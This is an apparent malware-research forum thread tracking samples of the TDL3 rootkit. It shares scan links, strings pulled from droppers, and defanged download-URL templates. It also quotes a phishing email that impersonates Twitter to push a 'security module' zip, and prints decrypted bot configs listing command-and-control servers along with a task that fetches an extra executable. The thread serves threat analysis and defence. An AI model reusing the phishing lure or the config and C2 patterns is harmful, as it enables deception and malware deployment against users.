[EP_X0FF]

Actually they even do not encrypted this message :)

Indestructible.
Determination that is incorruptible.
From the other side.
A terror to behold.
Kaspersky AV Suxx :) and so others are

http://www.virustotal.com/analisis/52df ... 1275486754

tdlcmd.dll indeed was updated to 3.82.

Btw this dropper contains full copy of Mark's DebugView 4.76 resources.

[cjbi]

Interesting strings from TDL3 sample.

So cold that you cannot cope
With a frozen heart
I guess we blow apart
I guessed it from the start
I do what I want to do and this is my job

It's song lyrics except last line.
Finger Eleven - Stay In Shadow http://www.youtube.com/watch?v=rVczoqOTFEQ

VirusTotal result
http://www.virustotal.com/analisis/87e7 ... 1275676692

[Maniac]

At least the song is nice. Thanks guys! :D

[EP_X0FF]

One of the tdl3 bundle satellites

http://virusscan.jotti.org/en/scanresul ... 4650bc318e

Contains list of malware urls inside.

hxxp://bbonusworld.com/ufwnltbz/
hxxp://abtdiagnostic.com/ufwnltbz/

%stxrzxs.php?adv=adv470&code1=%s&code2=%s&id=%d&p=%s
%sllvuaues.exe
%srvqxfn.php?adv=adv470
%sbmirouy.exe
%sfjnvpk.php?adv=adv470
%snluwuuhm.exe
%swzdcjrp.php?adv=adv470
%scatrtbpd.exe
%sgnemtrzxsn.php?adv=adv470
%sicxngxus.exe
%simwaic.php?adv=adv470
%semql.exe
%syptozgozmu.php?adv=adv470
%sotmdiqda.e
%stxrzxs.php?adv=adv470&code1=%s&code2=%s&id=%d&p=%s
%sllvuaues.exe
%srvqxfn.php?adv=adv470
%sbmirouy.exe
%sfjnvpk.php?adv=adv470
%snluwuuhm.exe
%swzdcjrp.php?adv=adv470
%scatrtbpd.exe
%sgnemtrzxsn.php?adv=adv470
%sicxngxus.exe
%simwaic.php?adv=adv470
%semql.exe
%syptozgozmu.php?adv=adv470
%sotmdiqda.exe
%sfwelcx.php?adv=adv470
%sflyfiudk.exe
%sfwevpovto.php?adv=adv470
%swdfppdai.exe
%skkemu.php?adv=adv470
%slfphs.exe
%soriqbjdp.php?adv=adv470
%srcapmvd.exe
%shypwhc.php?adv=adv470
%shyfahpxiq.php?adv=adv470

[gjf]

Some new old way to infect somebody :)

Hi, BlahBlah@microsoft.com!
Attention! We detected that someone was trying to steal your Twitter account password.
We strongly recomended you to download our secure module to protect account!
Please click on the link below:
hxxp://twitter.com/Twitter_security_model_setup.zip
(real link under URL: hxxp://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip)
The Twitter Team
If you received this message in error and did not sign up for a Twitter account, click not my account (real link under URL - again hxxp://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip).
Please do not reply to this message; it was sent from an unmonitored email address. This message is a service email related to your use of Twitter. For general inquiries or to request support with your Twitter account, please visit us at Twitter Support (and again hxxp://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip).

So - no matter what you will choose - you will be redirected :) And you wil receive

Twitter_security_model_setup.zip

(399.9 KiB) Downloaded 99 times

BTW - quite huge dropper in comparison with previous ones! :)

[EP_X0FF]

tdlcmd.dll updated to v3.83
added new configuration value

dropper
http://www.virustotal.com/analisis/9ce3 ... 1276058254

tdlcmd.dll
http://www.virustotal.com/analisis/139e ... 1276058250

removed upx
http://www.virustotal.com/analisis/7c4b ... 1276058320

driver loader
http://www.virustotal.com/analisis/392d ... 1276058320

[main]
quote=Tempers are wearing thin. Let's hope some robot doesn't kill everybody
version=3.273
botid=0
affid=0
subid=0
installdate=9.6.2010 4:33:16
builddate=8.6.2010 13:20:0
rnd=1229272821
knt=1276058307
[injector]
*=tdlcmd.dll
[tdlcmd]
version=3.83
bsh=xxx
delay=7200
servers=hxxps://873hgf7xx60.com/;hxxps://jro1ni1l1.com/;hxxps://61.61.20.132/;hxxps://1iii1i11i1ii.com/;hxxps://61.61.20.135/;hxxps://0o0o0o0o0.com/;hxxps://68b6b6b6.com/;hxxps://34jh7alm94.asia/
wspservers=hxxp://lk01ha71gg1.cc/;hxxp://zl091kha644.com/;hxxp://a74232357.cn/;hxxp://a76956922.cn/;hxxp://91jjak4555j.com/
popupservers=hxxp://cri71ki813ck.com/
clkservers=hxxp://lkckclckl1i1i.com/

[EP_X0FF]

I like this one :D

http://virscan.org/report/89efb05cfeafe ... 9c139.html

[erikloman]

Hitman Pro 3.5.6 build 100 BETA adds detection and removal of latest TDL3 Rootkit.
http://files.surfright.nl/HitmanPro35beta.exe

[EP_X0FF]

Hi,

I can confirm. I've tested latest build of Hitman Pro against TDL3 (sample posted in this thread above).
It detected and repaired infected driver with one reboot.

First post with TDL3 detection/removal software list is updated.

Regards.

[EP_X0FF]

hot recompiled sample

http://www.virustotal.com/ru/analisis/4 ... 1277091118 (3/41, ~7%)

[main]
quote=Dude, meet me in Montana XX00, Jesus (H. Christ)
version=3.273
botid=
affid=
subid=0
installdate=21.6.2010 3:34:51
builddate=21.6.2010 2:3:12
rnd=1390067357
knt=1277010763
[injector]
*=tdlcmd.dll
[tdlcmd]
version=3.83
delay=7200
servers=hxxps://873hgf7xx60.com/;hxxps://jro1ni1l1.com/;hxxps://61.61.20.132/;hxxps://1iii1i11i1ii.com/;hxxps://61.61.20.135/;hxxps://0o0o0o0o0.com/;hxxps://68b6b6b6.com/;hxxps://34jh7alm94.asia/
wspservers=hxxp://lk01ha71gg1.cc/;hxxp://zl091kha644.com/;hxxp://a74232357.cn/;hxxp://a76956922.cn/;hxxp://91jjak4555j.com/
popupservers=hxxp://cri71ki813ck.com/
clkservers=hxxp://lkckclckl1i1i.com/
[tasks]
206201051243=!hxxp://mffc.de/_022.exe

Downloads additional payload (i have no time to analyze)
http://www.virustotal.com/ru/analisis/3 ... 1277091502